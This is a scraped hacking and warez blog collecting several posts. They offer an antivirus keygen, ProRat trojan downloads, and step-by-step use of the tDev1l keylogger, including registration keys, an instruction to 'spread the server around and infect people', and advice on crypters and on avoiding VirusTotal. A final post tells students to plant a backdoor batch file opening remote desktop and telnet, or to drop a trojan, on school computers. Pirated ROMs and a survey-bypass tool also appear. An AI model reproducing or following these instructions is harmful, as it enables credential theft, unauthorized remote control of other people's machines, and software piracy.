0 Comments
Posted in Arrangement, Art, Business

ESET NOD32 ANTIVIRUS KEYGEN



ESET is an IT company who is creator of A well known Antivirus.But that's not free.So in this post I will show you a generator for ESET NOD 32.
1)Download ESET ANTIVIRUS from here.
2)ESET NOD 32 Antivirus.
3)Install it.
4)Download  ESET NOD32 ANTIVIRUS KEYGEN from here.


USE IT TO ACTIVATE THE ANTIVIRUS.ITS IS LIFE TIME AND WONT BE BLOCKED EVEN AFTER UPDATES.!!!!!!!!!!BE HAPPY  :)


0 Comments
Posted in Arrangement, Art, Business

UNLOCK YOUR COMPUTER WITH YOUR FACE



I have earlier posted about how to lock your computer with USB(UNIVERSAL BUS CONTROLLER).
But now let us talk about locking computer with your face.The software used here is KeyLemon.
I recommend BANANA SCREEN the older version of Key Lemon  which is free.The new versions are not free.You have to buy it.
You can download free Banana Screen by clicking here.
You can either download the latest Key Lemon by paying full amount.Please Click here
Even though I don't recommend torrent of  KeyLemon.If you are interested you can download it from:
1)FROM KAT(please click here)


Install it .
To have help you can either click here  or post a comment with the version of the program.




LET ME TELL YOU ABOUT KEY LEMON

KeyLemon is a simple and convenient solution to log on to your personal Windows account by using your face. KeyLemon automatically logs you into the right Windows account. When you leave the computer, it will automatically lock it and then unlock it when you are back. All you need is just a webcam and KeyLemon Screen.
Why KeyLemon ?
As a Windows and frequently internet user, you probably deal with lots of passwords every day. Remembering each set of login details and typing them in can be time consuming and very frustrating.
Also  KeyLemon works as a password manager for popular internet sites. When you connect to a website (Facebook, Twitter and / or LinkedIn), KeyLemon automatically logs you into your account by using your face. It works on all windows OS versions from XP to Windows 7.

0 Comments
Posted in Arrangement, Art, Business

Lock Your Computer With USB Flash Drive



Now a days unauthorized access to Laptops and Desktops are becoming a problem of concern,since it results in copying details which are not supposed  to.
In this post I will show you how to lock your computer with your USB(Universal Serial Bus).
The software I will be using is Predator :




Here is the Trick to lock Your Computer With Usb Using Predator

1. Download predator software by clicking here 

2. Predator will get launched automatically after completing installation if not you can run it fromStart/Programs/Predator

3. Now Insert your Usb. You will get a message to define your new password (This process will not format your pendrive and your pendrive data will not be affected by this at all)



4. Click on Ok and Enter your your new password in next dialog box

5. Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list

6. Finally click on Create Key button and then on OK
 button



After this the software will automatically exit.Now restart the program by clicking the icon on desktop.

Predator will take few seconds for initialization. Once the icon in the taskbar turns green then your software has initialized itself. 

TO DOWNLOAD PREDATOR Please Click Here
0 Comments
Posted in Arrangement, Art, Business

E-MAIL HACKING SOFTWARE



I have previously posted about how to hack Facebook,Gmail,etc.using Keyloggers.
But for that u need either physical access to the victims P.C or either u have to send it through a mail.
But this time I am going to give u a software to hack Email and Even Control Victims P.C.
The Software is Produced By ProRat.
 All zip files are password protected:
Password for the zip files which you will download below is : "pro" (Without Quotation Marks).

Let me tell u something about this.ProRat is a Microsoft Windows based backdoor trojan horse, more commonly known as a RAT (Remote Administration Tool). As with other trojan horses it uses a client and server. ProRat opens a port on the computer which allows the client to perform numerous operations on the server (the machine being controlled). ProRat is available in a free version, and a paid version. In the free version, ProRat cannot connect to users over wide area networks (WANs), only over LANs (Local Area Networks). ProRat is known for its server to be almost impossible to remove without up-to-date antivirussoftware.

Features


ProRat allows many malicious actions on the victim's machine. Some of its abilities include:
  • Logging keystrokes
  • Stealing passwords
  • Full control over files
  • Drive formatting
  • Open/close CD tray
  • Hide taskbar, desktop, and start button
  • Writing on-screen
  • Movement of cursor
  • Take screenshots
  • View system information
  • View webcam
  • Download & run files

Infection Method

ProRat has a server creator with features that allow it to be undetected by antivirus and firewall software, and also allow it to stealthily run in the background. The software runs completely (including rootkit) in Windows, and such features include killing security software, removing and disabling system restore points, and displaying a fake error message to mislead the victims.

Removal Method

ProRat is known for its server / trojan to be almost impossible to remove.Even up-to-date antivirus fails sometimes to completely remove ProRat from the system. Another known problem is that the antivirus can't fix the damage caused by ProRat.
It is however known that the ProRat client itself provides a feature to remove the infection. Most likely this feature was added to prevent users from digging their own hole when trying to infect people with the executable trojan file.

AN OVERALL DETAIL ABOUT PRORAT

Discovered:
June 13, 2003
Updated:
February 13, 2007 12:19:57 PM
Also Known As:
Backdoor.Prorat.10b3 [Kaspersk
Type:
Trojan Horse
Systems Affected:
Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP

TO DOWNLOAD :Click Here PLease
0 Comments
Posted in Arrangement, Art, Business

THE BEST OS FOR HACKERS

Posting about keylogger's for both linux and windows{MULTIPLE FILES ARE  POSTED.CHECK SITE MAP)is prompting me to post in a higher level.Instead of  using programs I am  going to show an OS "Completely for Hacking"
BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.

Regardless if you’re making BackTrack your primary operating system, booting from a Live DVD, or using your favourite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

Back Track is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hatters, it is an easy access to software that facilitates exploitations of secure system. For white-hatters, it is a penetration tester that finds holes in a security scheme. See, everybody wins!

Major Features

BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will no enter monitor mode or inject packets without the MadWiFi driver patch. With BackTrack, you don’t need to worry about that. It’s just plug-and-play ready-to-go!

What’s great is that this Linux distribution comes Live-on-CD. So, no installation is needed. However, what you experience BackTrack, you will realize that it is a must to download this operating system and install it on your Laptop. At the very least, download the VMWare Virtual Appliance for Backtrack. Make sure you also install the VMWare Tools for Linux as well. Many features will still work in VMWare mode.
  • Based on: Debian, Ubuntu
  • Origin: Switzerland
  • Architecture: i386
  • Desktop: Fluxbox, KDE
  • Category: Forensics, Rescue, Live Medium
  • Cost: Free

Tools:

BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well known security tools including:
  • Metasploit integration
  • RFMON Injection capable wireless drivers
  • Kismet
  • Nmap
  • Ettercap
  • Wireshark (formerly known as Ethereal)
  • BeEF (Browser Exploitation Framework)

A large collection of exploits as well as more common place software such as browsers. BackTrack arranges tools into 11 categories:
  • Information Gathering
  • Network Mapping
  • Vulnerability Identification
  • Web Application Analysis
  • Radio Network Analysis (802.11, Bluetooth, Rfid)
  • Penetration (Exploit & Social Engineering Toolkit)
  • Privilege Escalation
  • Maintaining Access
  • Digital Forensics
  • Reverse Engineering
  • Voice Over IP

Download and Documents:

Home Page
User Forums
Documentation
Download Mirrors


0 Comments
Posted in Arrangement, Art, Business

KEYLOGGERS FOR LINUX

I have earlier posted about keyloggers which can hack passwords and monitor  keyboard and system processes.
All those were windows based and now a "KEYLOGGER" for LINUX based Systems....
Spreading OFFENSIVE SECURITY TO LINUX.......

LKL is a famous Linux keylogger that runs under Linux on the x86 arch. LKL sniffs and logs everything that passes through the hardware keyboard port (0x60). It translates keycodes to ASCII with a keymap file.

Installation:

The 'configure' shell script attempts to guess correct values for various system-dependent variables used during compilation.

It uses those values to create a 'Makefile' in each directory of the package. It may also create one or more '.h' files containing system-dependent definitions.

Finally, it creates a shell script 'config.status' that you can run in the future to recreate the current configuration, a file 'config.cache' that saves the results of its tests to speed up
reconfiguring, and a file 'config.log' containing compiler output (useful mainly for debugging 'configure').

If you need to do unusual things to compile the package, please try to figure out how 'configure' could check whether to do them, and mail diffs or instructions to the address given in the 'README' so they can be considered for the next release.

If at some point 'config.cache' contains results you don't want to keep, you may remove or edit it.

The file 'configure.in' is used to create 'configure' by a program called 'autoconf'. You only need 'configure.in' if you want to change it or regenerate 'configure' using a newer version of 'autoconf'.

The simplest way to compile this package is:

1. 'cd' to the directory containing the package's source code and type './configure' to configure the package for your system.

If you're using 'csh' on an old version of System V, you might need to type 'sh ./configure' instead to prevent 'csh' from trying to execute 'configure' itself.

Running 'configure' takes awhile. While running, it prints some messages telling which features it is checking for.

2. Type 'make' to compile the package.

3. Optionally, type 'make check' to run any self-tests that come with the package.

4. Type 'make install' to install the programs and any data files and documentation.

5. You can remove the program binaries and object files from the source code directory by typing 'make clean'. To also remove the files that 'configure' created (so you can compile the package for a different kind of computer), type 'make distclean'.

There is also a 'make maintainer-clean' target, but that is intended mainly for the package's developers. If you use it, you may have to get all sorts of other programs in order to regenerate files that came with the distribution.
DOWNLOAD "LKL" .Please Click Here

Do you have questions, comments, or suggestions? Feel free to post a comment! 



0 Comments
Posted in Arrangement, Art, Business

Remote Password Hacking/Stealer Tool

Hack E-Mail Passwords using Remote Password Hacking Tool

tDev1l keylogger is used to steal all stored passwords on victim computer. When victim opens our sent keylogger on his computer, it searches for all saved passwords on his computer and then simply sends those saved passwords along with user ids to you via email.


How to use tDev1l keylogger
?


1. First of all download tDev1l keylogger from here.

You need a registration key to unlock it. Use one of these: tdev1l-its-0k-2-cry or devil-its-0k-2-cry 

2. Run "tDevil.exe" file to get something like this:(The one in the figure)

3. Now simply type in your Gmail email adress and password (You can create a gmail account only for keyloggers, like this one), in "Send Logs Every Minute" choose like 30, so every 30 minutes u will get a email with the key logs. Now press "Build" and send the built app to victim. When they open nothing happens, but there keylogged and every 30 min u will get email with there key logs in.

4. To remove the Keylogger from your pc open taskmanager and kill the process "server.exe".

Now all you have to do is spread the server around and infect people with it and soon you will have lots of email in your gmail account with there Keystrokes.

5. This password stealer server is detected as virus during runtime. But, its 100% FUD (Fully Undetectable) during scantime. So, you can use Crypter / Binder to get rid of antivirus detection.


Very Important:
 Do not scan these tools on VirusTotal. Use http://scanner.novirusthanks.org and also check the "Do not distribute the sample" option.



0 Comments
Posted in Arrangement, Art, Business

How To Download and Play Sony PlayStation 1 (PSX) Games on your PC

Play all of your favorite PS 1 games on your computer using ePSXe Emulator.

Remember Final Fantasy VIII? Remember Eden, Bahamuth, Shiva?? Or Suikoden II, Parasite Eve, Lunar, Rayman, Hercules, Xenogears?? Those were old, good times. Ever wish to play those games all over again or maybe finish them for the first time? You can install and run the necessary software to turn your PC into a virtual PlayStation. Today there are a lot of tutorials on the net about how to download and play PlayStation 1 games on your computer, but only few of the tutorials are really working and the others are not completelyfinished or aren't explained good and you can't understand them. Here i'll write a full tutorial to run PSX games on your computer. I will be posting links where to get emulator, ISOs and more!

Lets start:

1. Download ePSXe (PS1 emulator)

First of all you need to Download ePSXe. It's available for Linux and Windows. I recommend you to download version v.1.6.0 or lower (don't download any beta version).


2. Download plugins

Plugins will be necessary. You can download plugins for both OS, Windows and Linux. There are three plugins you basically need to run the program.
Go to http://www.ngemu.com/psx/epsxe.php?action=plugins and then press Ctrl+F and download the following plugins:

Graphic Plugins:

P.E.Op.S. Soft GPU (v1.18b)
Pete's GPU Plugins (v1.77)

Sound Plugins:

Eternal SPU (v1.41)
P.E.Op.S. DSound (v1.9)

CD Plugins (To make Game Rips such as ISOs and CDs run on ePSXe):

CDR Mooby (v2.8)
P.E.Op.S. CDR (v1.4)

You can also download Misc Plugins which allows you to play over the net, but those aren't necessary.

Extract the files into the "plugins" folder in the ePSXe. (It's NOT in C://Program Files...! Remember the path when you download the ePSXe program in the first place? And you double click on it to run it? Go there and you will find the "plugins" folder)

3. Download BIOS

Now it's time to get the BIOS in order to play the games. You'll need a file called scph1001.dll. Here is a website where you can download your BIOShttp://dragonballarena.gamesurf.it/english/media/giochi/psx.php.


After the download is complete, place it on the "bios" folder in the ePSXe.

4. Download your game!!

You can type your game on google and search for it, or get torrent on isohunt, mininova or anything... Here are some good sites to download your PSX ISOs:
http://www.emuparadise.org/roms/psx/
http://www.romulation.net/PSX/
http://romhustler.net/roms/psx
http://nitroroms.com/roms/Sony_PSX
http://www.rom-freaks.net/psx-isos-0-asc-name-.html

5. Configuration

Before you start using ePSXe you need to configure some settings. Select the icon that looks like a PSX controller ( that's the emulator itself ) and a window that says ePSXe should pop up. Now choose the Configtab and you are ready to configure the plugins and the bios that you've downloaded.


Config - Video



  • Choose the plugin that you want to use. I use Pete's DX6 D3D Driver. Now choose Configure


  • Choose the resolution, or whether you want to play it in a window. If you are wondering if the resolution depends on your computer performance... I personally choose window. Now on Default Settings (bottom-left) click Nice and OK.


Config - Sound

  • Choose the plugin. I use P.E.Op.S. DSound Audio Driver -> Configure

  • Choose following options:
Mode : 2
Volume : 1
Reverb : 2
Interpolation: 3

Leave the rest as default and OK.


Config - Cdrom

  • Choose the plugin. I use P.E.Op.S. CDR Driver

  • Don't need to configure anything there.. leave it as default.

Config - Bios


  • Locate the scph1001.dll and click OK

Config - Game Pad - Pad 1


  • Adjust it at your convenience...

Now your all set and you can start playing some PSX Games!!!

File - Run ISO and Locate the PS1 game you want to play. If in the folder that you've downloaded there are more than one file, choose the one with the bigger size.


Enjoy Gaming!


If you can't find some of the plugins or if you don't want to spend much of your precious time searching for bios and all other necessary stuff, you can download my ePSXe with all these stuff in it. Now all you have to do is just to configure the settings and you are ready to play.

Download ePSXe with All Plugins and BIOS for it

0 Comments
Posted in Arrangement, Art, Business

Download From Sharecash Without Doing Surveys - ShareCash Downloader

This little trick will help you to download from Sharecash without doing surveys. Now you can skip Sharecash ads with few mouse clicks…

Sharecash Downloader to Bypass Sharecash Downloads:

Sharecash downloader helps you to bypass Sharecash surveys. Follow the steps below and you will be able to bypass Sharecash.

1. Free Download Sharecash Downloader from here
.
THE USERNAME AND PASSWORD IS NOT WORKING..........
NEW USERNAME:-its4u    password :123456
2. Extract and run this Sharecash downloader on your computer.



Select the "Original" checkbox and use sharecash original link.

Note: Also provided Sharecash Reflector to convert Mirror link to original sharecash link.

3. Copy your Sharecash file link, paste it in the text box and hit on "Navigate to sharecsh link" button. After that Download button will get visible.



4. Wait for few seconds and click the Download Button. New window will appear asking you for the output location where you want to save the file, and click Yes.



Sharecash Downloader will start downloading your file from Sharecash without requiring you to complete sharecash surveys.



Now you are able to bypass Sharecash survey using Sharecash Downloader software.

Please Note: If nothing happens when you start the program or if you get any error messages upon launching the program, download and install the latest version of Microsoft .NET Framework. 
0 Comments
Posted in Arrangement, Art, Business

How To Hack Your School Network

Because of the frequency this question has been asked on this blog, i have decided to create a document for this question. This tutorial is for those newbies out there, wanting to "hack" their school. I'm gonna start by saying, if your going to hack the school, theres a high probability your get caught, and don't do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will allow you to take control of the PC's at school. Lets start:

How to take control of the PC's at school:

Here are the steps;

  1. Preparing The Virus
  2. Setting Up The Virus
  3. Controlling The PC

Obviously, if you gonna take control over your school PC you need a virus. You have 2 methods:
  1. The virus I made which is harmless and you won't even notice it was executed.
  2. Dropping a Trojan on the school PC.
Method 1

What you need:
  • Pen Drive (You can buy one, or you just use yours)
  • Brain (You can't buy this)

Now, open notepad and copy/paste this code: the code

Save the file as something.bat (you can change something to whatever you want). In "Save as type:" choose "All Files".


I strongly recommend you not to change the rdport and tnport configuration. The rdport will open the remote desktop default port, and the tnport will open the telnet's client default port.

You can change the username, password and the rport (randomn port you choose to be opened)

At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.

Save it and remove your pen drive.

Take your pen drive to school and run the bat file. Don't forget the pc you runned it in cause you might need it.

When you get home go to your pc and try to telnet them or remote desktop the PC.

Method 2:

In this method we will use a Trojan to control the school PC.

Here is a tutorial about how to create a Trojan: ProRat Trojan

Now just create a server (there is an explanation in the tutorial above), bind it and put it into your pen drive. Make sure you leave your PC turned on.

Then go to your school and drop the trojan.

Other way to do this is to give your trojan to a friend and tell him to stay in school. When you arrive home, send him a SMS and tell him to drop the trojan. This way you could even see if it worked.

After this you can probably do whatever you want with the PC.